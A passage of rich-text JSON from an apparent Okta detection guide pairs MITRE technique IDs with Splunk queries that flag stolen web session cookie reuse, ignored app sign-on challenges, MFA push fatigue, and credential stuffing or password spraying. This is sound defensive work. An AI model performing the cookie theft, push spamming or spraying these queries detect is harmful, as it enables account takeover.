(Okta)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A detection opportunity arises when an adversary attempts to reuse a stolen web session cookie.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following analytic looks for one or more policy evaluation events in which multiple client values (IP, User Agent, etc.) change associated to the same Device Token for a specific user. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The query below: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Retrieves policy evaluation events from successful authentication events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Aggregates/Groups by Device Token and User, providing the first policy evaluation event in the search window.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluates whether there is more than one IP and whether there is more than one OS or browser for each combination of User/Device 
Token.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"index=main sourcetype=OktaIM2:log eventType IN (policy.evaluate_sign_on) outcome.result IN (ALLOW, SUCCESS)    | stats earliest(_time) as _time values(client.ipAddress) as src_ip values(client.userAgent.rawUserAgent) as user_agent values(client.userAgent.os) as userAgentOS_list values(client.userAgent.browser) as userAgentBrowser_list values(device.os_platform) as okta_device_os dc(client.userAgent.browser) as dc_userAgentBrowser dc(client.userAgent.os) as dc_userAgentOS dc(client.ipAddress) as dc_src_ip values(outcome.reason) as reason by debugContext.debugData.dtHash actor.alternateId\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    ``` If we see different Operating Systems or Browsers from a UserAccount using with the same DTHash ```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | where dc_src_ip>1 AND (dc_userAgentOS>1 OR dc_userAgentBrowser>1)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk 
Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/71ad47d1-d6bd-4e0a-b35c-020ad9a6959e/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"71ad47d1-d6bd-4e0a-b35c-020ad9a6959e \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple Failed Requests to Access Okta Applications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1550/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1550.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1538/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1538\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Steal Web Session Cookie\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"John Murphy (Okta)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A detection opportunity arises when an adversary attempts to reuse a stolen web session cookie in an org with well-configured authentication policies. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following analytic looks for multiple attempts to open app chiclets with no successful response to an authentication challenge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The query below: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Retrieves policy evaluation and SSO details in events that contain the Application requested\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Formats target fields so we can aggregate specifically on Applications (AppInstances)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Groups by User, Session and IP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creates a ratio of successful SSO events to total MFA challenges related to Application Sign On Policies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Alerts when fewer than half of the challenged app sign-on attempts succeeded (ratio < 0.5) and three or more apps were challenged in the session (total_challenges > 2); tune both thresholds to your environment.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"index=main sourcetype=oktaim2:log target{}.type=AppInstance (eventType=policy.evaluate_sign_on outcome.result=CHALLENGE) OR 
(eventType=user.authentication.sso outcome.result=SUCCESS) \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | eval targets=mvzip('target{}.type', 'target{}.displayName', \\\": \\\")\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | eval targets=mvfilter(targets LIKE \\\"AppInstance%\\\")\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    ```Stats per user/session/ip/target app```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | stats count min(_time) as _time values(outcome.result) as outcome.result dc(eval(if(eventType=\\\"policy.evaluate_sign_on\\\",targets,NULL))) as total_challenges sum(eval(if(eventType=\\\"user.authentication.sso\\\",1,0))) as total_successes \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    by authenticationContext.externalSessionId targets actor.alternateId client.ipAddress\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    ```Exclude apps that don't require a challenge```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | search total_challenges > 0\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    ```Group events by session/actor/ip```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | stats min(_time) as _time values(*) as * sum(total_challenges) as total_challenges sum(total_successes) as total_successes values(eval(if('outcome.result'=\\\"SUCCESS\\\",targets,NULL))) as success_apps 
values(eval(if('outcome.result'!=\\\"SUCCESS\\\",targets,NULL))) as no_success_apps by authenticationContext.externalSessionId actor.alternateId client.ipAddress\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | fillnull\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | eval ratio=round(total_successes/total_challenges,2), severity=\\\"HIGH\\\", mitre_technique_id=\\\"T1538\\\", description='actor.alternateId'. \\\" from \\\" . 'client.ipAddress' . \\\" seen opening \\\" . total_challenges . \\\" chiclets/apps with \\\" . total_successes . \\\" challenges successfully passed\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | fields - count, targets\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    ```Assuming a majority of apps have good sign-on policies, if we see three apps with ignored challenges, that's worth investigating```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    | search ratio < 0.5 total_challenges > 2\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/1c21fed1-7000-4a2e-9105-5aaafa437247/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"1c21fed1-7000-4a2e-9105-5aaafa437247 
\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mismatch Between Source and Response for Verify Push Request\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1621\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1621\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-Factor Authentication Request 
Generation\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"John Murphy and\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Jordan Ruocco (Okta)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A detection opportunity arises when an adversary that has stolen a user password attempts to trick a user into accepting an Okta Verify Push request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following analytic identifies variations in client-based values for source and response events to identify suspicious request behavior. 
The detection is enhanced if the org is evaluating behavior conditions in sign-on policies using Okta Behavior Detection.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The query below: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Groups by SessionID and retrieves any system.push.send_factor_verify_push events (the source of the push) and user.authentication.auth_via_mfa events where the factor is OKTA_VERIFY_PUSH - (the user response to the push)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Counts the total number of push events, successful authentication events, and any push sources where the client is a new device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creates a ratio of successful sign-ins to pushes. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the ratio (currently tuned aggressively) indicates push spam, or if a user has rejected a push, the detection proceeds to evaluate whether there is more than one IP address used during the session (session roaming) and the presence of both a new IP and new device during the session.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"index=main sourcetype=OktaIM2:log eventType IN (system.push.send_factor_verify_push) OR (eventType IN (user.authentication.auth_via_mfa) debugContext.debugData.factor=\\\"OKTA_VERIFY_PUSH\\\")\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| eval groupby='authenticationContext.externalSessionId'\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    ``` Each push is sent to each registered push device, so we should group pushes around the same time as a single event for the purpose of this use-case ``` \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| eval group_push_time=_time \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| bin span=2s group_push_time \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| fillnull value=NULL 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| stats min(_time) as _time by authenticationContext.externalSessionId eventType debugContext.debugData.factor outcome.result actor.alternateId client.device client.ipAddress client.userAgent.rawUserAgent debugContext.debugData.behaviors group_push_time groupby\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| iplocation client.ipAddress\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| fields - lat, lon, group_push_time\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    ```Get counts for number of push events, successful authentication events, and any push sources where the client is a new device ``` \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| stats min(_time) as _time dc(client.ipAddress) as dc_ip \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    sum(eval(if(eventType=\\\"system.push.send_factor_verify_push\\\" AND 'outcome.result'=\\\"SUCCESS\\\",1,0))) as total_pushes \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    sum(eval(if(eventType=\\\"user.authentication.auth_via_mfa\\\" AND 'outcome.result'=\\\"SUCCESS\\\",1,0))) as total_successes \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    sum(eval(if(eventType=\\\"user.authentication.auth_via_mfa\\\" AND 'outcome.result'=\\\"FAILURE\\\",1,0))) as total_rejected \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    
sum(eval(if(eventType=\\\"system.push.send_factor_verify_push\\\" AND 'debugContext.debugData.behaviors' LIKE \\\"%New Device=POSITIVE%\\\",1,0))) as suspect_device_from_source \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    sum(eval(if(eventType=\\\"system.push.send_factor_verify_push\\\" AND 'debugContext.debugData.behaviors' LIKE \\\"%New IP=POSITIVE%\\\",1,0))) as suspect_ip_from_source \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    values(eval(if(eventType=\\\"system.push.send_factor_verify_push\\\",'client.ipAddress',\\\"\\\"))) as src \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    values(eval(if(eventType=\\\"user.authentication.auth_via_mfa\\\",'client.ipAddress',\\\"\\\"))) as dest \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    values(*) as * by groupby \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| eval ratio = round(total_successes/total_pushes,2)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    ```Create a ratio of successful sign ins to pushes. If the push and response come from the same IP, it's likely legit. Note that the current ratio is quite aggressive. 
Aside from tuning the ratio you could add other conditions, for example: dc Country > 1, other behaviors (NEW Geo-Location=POSITIVE), device.managed=false, client.os!={SOE_OS}```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"| search ((ratio < 0.5 AND total_pushes > 2) OR (total_rejected > 0)) AND dc_ip > 1 AND suspect_device_from_source > 0 AND suspect_ip_from_source > 0\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/8085b79b-9b85-4e67-ad63-351c9e9a5e9a/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"8085b79b-9b85-4e67-ad63-351c9e9a5e9a\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Login Failure with High Unknown 
Users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force: Credential Stuffing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provides a platform detection for multiple login failures with high unknown user counts from the same IP across one or more Okta orgs. 
More info \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"here\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Login failures with high unknown users count\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/632663b0-4562-4aad-abe9-9f621a049738/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"632663b0-4562-4aad-abe9-9f621a049738\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Suspected Password Spray 
Attack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/003/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.003\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",